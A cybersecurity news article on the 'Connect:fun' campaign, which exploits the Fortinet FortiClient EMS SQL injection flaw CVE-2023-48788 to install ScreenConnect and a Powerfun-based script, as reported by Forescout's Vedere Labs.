15 April 2024

Connect:fun campaign targets Fortinet bug to deploy malware and RMTs


Connect:fun campaign targets Fortinet bug to deploy malware and RMTs

Security researchers spotted an exploitation campaign that targets organizations using an SQL injection vulnerability in Fortinet's FortiClient Enterprise Management Server (EMS) software.

Tracked as CVE-2023-48788, the issue was brought to public attention on March 12, 2024. Subsequently, on March 21, researchers released a proof of concept (PoC) exploit for this vulnerability. Since then, reports have surfaced of active exploits in the wild, prompting the US Cybersecurity and Infrastructure Security Agency (CISA) to include CVE-2023-48788 in its list of Known Exploited Vulnerabilities (KEV) on March 25.

Dubbed "Connect:fun" by Forescout Research’s Vedere Labs, the campaign has been attributed to a threat actor believed to be in operation since at least 2022. Evidence suggests that the threat actor targets Fortinet appliances and employs a combination of Vietnamese and German languages within their infrastructure.

“Initially perceived as a security team or research team in Vietnam based on the Github repository, they are actively exploiting and installing tools post-exploitation on real targets instead of only researching,” the threat analysis team said.

The observed attack targeted an unnamed media company in March 2024, the researchers said.

On March 21, server logs revealed the threat actor's attempts to exploit CVE-2023-48788, aiming for command execution by manipulating SQL Server configurations.

Exploiting the SQL injection flaw, the actor successfully deployed the ScreenConnect remote management tool and a customized script based on Powerfun, an open-source utility with versatile capabilities, including bind and reverse shells, as well as arbitrary command execution.

The attackers then used certutil.exe to download ScreenConnect from the domain ursketz[.]com, followed by installation via msiexec.exe. The researchers said they weren’t able to retrieve the ScreenConnect logs to identify the actor’s further actions.

“This is evidence the activity is part of a specific campaign rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances,” Forescout noted.


Back to the list

Latest Posts

ICC investigates cyberattacks in Ukraine as possible war crimes

ICC investigates cyberattacks in Ukraine as possible war crimes

The probe is focused on cyberattacks that endangered lives by disrupting essential services.
17 June 2024
Alleged Scattered Spider leader arrested in Spain

Alleged Scattered Spider leader arrested in Spain

The suspect is believed to be a key player in the MGM ransomware attack.
17 June 2024
Scattered Spider hackers switch focus to cloud apps for data theft

Scattered Spider hackers switch focus to cloud apps for data theft

Mandiant has observed UNC3944 accessing platforms like vSphere and Azure via SSO applications to create new virtual machines.
17 June 2024